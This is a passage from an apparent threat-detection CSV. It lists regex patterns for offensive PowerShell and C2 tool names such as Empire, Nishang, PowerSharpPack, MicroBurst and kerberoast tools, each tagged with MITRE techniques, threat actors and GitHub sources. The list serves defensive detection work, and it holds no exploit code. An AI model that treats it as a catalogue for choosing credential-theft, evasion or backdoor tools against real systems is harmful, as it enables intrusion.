T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","48810" "*Invoke-ADCSTemplateRecon*",".{0,1000}Invoke\-ADCSTemplateRecon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","48811" "*Invoke-Adeleginator*",".{0,1000}Invoke\-Adeleginator.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","48812" "*Invoke-ADEnum -*",".{0,1000}Invoke\-ADEnum\s\-.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","48813" "*Invoke-ADEnum.ps1*",".{0,1000}Invoke\-ADEnum\.ps1.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","1","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","48814" 
"*Invoke-adPEAS*",".{0,1000}Invoke\-adPEAS.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","48815" "*Invoke-ADSBackdoor*",".{0,1000}Invoke\-ADSBackdoor.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","48817" "*Invoke-ADSBackdoor*",".{0,1000}Invoke\-ADSBackdoor.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","48818" "*Invoke-ADSBackdoor*",".{0,1000}Invoke\-ADSBackdoor.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","48819" "*Invoke-ADSBackdoor*",".{0,1000}Invoke\-ADSBackdoor.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","48820" "*Invoke-ADSBackdoor.json*",".{0,1000}Invoke\-ADSBackdoor\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","48821" "*Invoke-AirstrikeAttackCheck*",".{0,1000}Invoke\-AirstrikeAttackCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","48822" "*Invoke-AirstrikeAttackCheck*",".{0,1000}Invoke\-AirstrikeAttackCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - 
TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","48823" "*Invoke-AllAccessChecks*",".{0,1000}Invoke\-AllAccessChecks.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","48824" "*Invoke-AllChecks*",".{0,1000}Invoke\-AllChecks.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Check for vulnerable programs and configs","T1550 - T1555 - T1212 - T1558","N/A","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","48825" "*Invoke-AmsiBypass*",".{0,1000}Invoke\-AmsiBypass.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","48826" "*Invoke-AmsiBypass*",".{0,1000}Invoke\-AmsiBypass.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","48827" "*Invoke-AmsiBypass*",".{0,1000}Invoke\-AmsiBypass.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","48828" "*Invoke-APIConnectionHijack.ps1*",".{0,1000}Invoke\-APIConnectionHijack\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","48829" "*Invoke-ApplicationsOnStartupCheck*",".{0,1000}Invoke\-ApplicationsOnStartupCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","48830" 
"*Invoke-ApplicationsOnStartupCheck*",".{0,1000}Invoke\-ApplicationsOnStartupCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","48831" "*Invoke-ArgFuscator -*",".{0,1000}Invoke\-ArgFuscator\s\-.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","48832" "*Invoke-ArgFuscator.ps1*",".{0,1000}Invoke\-ArgFuscator\.ps1.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","1","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","48833" "*Invoke-ArgFuscator.psd1*",".{0,1000}Invoke\-ArgFuscator\.psd1.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","1","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","48834" "*Invoke-ArgFuscator.psm1*",".{0,1000}Invoke\-ArgFuscator\.psm1.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","1","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","48835" "*Invoke-ArgFuscator-main.zip*",".{0,1000}Invoke\-ArgFuscator\-main\.zip.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","1","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","48836" "*Invoke-ARPScan*",".{0,1000}Invoke\-ARPScan.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - 
CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-ARPScan.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48837" "*invoke-arpscan*",".{0,1000}invoke\-arpscan.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","48838" "*Invoke-ARPScan.ps1*",".{0,1000}Invoke\-ARPScan\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1077","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48839" "*Invoke-ASREPRoast*",".{0,1000}Invoke\-ASREPRoast.{0,1000}","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. 
","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","N/A","3","202","58","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z","48840" "*Invoke-Assembly.ps1*",".{0,1000}Invoke\-Assembly\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48841" "*InvokeAssembly.x64.dll*",".{0,1000}InvokeAssembly\.x64\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - 
T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","48842" "*Invoke-AutoKerberoast*",".{0,1000}Invoke\-AutoKerberoast.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","N/A","1","73","18","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z","48843" "*Invoke-AutoOAuthFlow*",".{0,1000}Invoke\-AutoOAuthFlow.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","Automates the OAuth flow completion to obtain access and refresh keys when a user grants consent to an app registration","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48844" "*Invoke-AutoTokenRefresh*access_token.txt*",".{0,1000}Invoke\-AutoTokenRefresh.{0,1000}access_token\.txt.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","48845" "*Invoke-AzElevatedAccessToggle*",".{0,1000}Invoke\-AzElevatedAccessToggle.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation 
tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","48846" "*Invoke-AzRESTBastionShareableLink*",".{0,1000}Invoke\-AzRESTBastionShareableLink.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","48847" "*Invoke-AzureAdPasswordSprayAttack*",".{0,1000}Invoke\-AzureAdPasswordSprayAttack.{0,1000}","offensive_tool_keyword","o365spray","Username enumeration and password spraying tool aimed at Microsoft O365","T1110.003 - T1087.002","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/0xZDH/o365spray","1","1","N/A","N/A","8","9","846","100","2024-11-06T00:49:23Z","2019-08-07T14:47:45Z","48848" "*Invoke-AzureEnum.ps1*",".{0,1000}Invoke\-AzureEnum\.ps1.{0,1000}","offensive_tool_keyword","Invoke-AzureEnum","This cmdlet is used to perform users enumeration against Azure","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Discovery","https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzureEnum.ps1","1","1","N/A","N/A","N/A","6","520","92","2023-12-08T15:50:39Z","2019-11-20T22:07:50Z","48849" "*Invoke-AzurePasswordSpray*",".{0,1000}Invoke\-AzurePasswordSpray.{0,1000}","offensive_tool_keyword","Invoke-AzurePasswordSpray","This cmdlet is used to perform a password spray attack against Azure accounts using legacy Basic Authentication","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/tobor88/PowerShell-Red-Team/blob/master/Invoke-AzurePasswordSpray.ps1","1","1","N/A","N/A","N/A","6","520","92","2023-12-08T15:50:39Z","2019-11-20T22:07:50Z","48850" 
"*Invoke-AzureRmVMBulkCMD.ps1*",".{0,1000}Invoke\-AzureRmVMBulkCMD\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","48851" "*Invoke-AzVMBulkCMD.ps1*",".{0,1000}Invoke\-AzVMBulkCMD\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","48852" "*Invoke-BackdoorLNK*",".{0,1000}Invoke\-BackdoorLNK.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-BackdoorLNK.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48853" "*Invoke-BackdoorLNK.ps1*",".{0,1000}Invoke\-BackdoorLNK\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - 
T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48854" "*Invoke-BadPotato*",".{0,1000}Invoke\-BadPotato.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","48855" "*Invoke-BadZure*",".{0,1000}Invoke\-BadZure.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/mvelazc0/BadZure/","1","1","N/A","N/A","5","5","451","26","2025-04-10T03:20:03Z","2023-05-05T04:52:21Z","48856" 
"*Invoke-BetterSafetyKatz*",".{0,1000}Invoke\-BetterSafetyKatz.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","48857" "*Invoke-BetterXencrypt*",".{0,1000}Invoke\-BetterXencrypt.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","48858" "*Invoke-Binary *.exe*",".{0,1000}Invoke\-Binary\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature 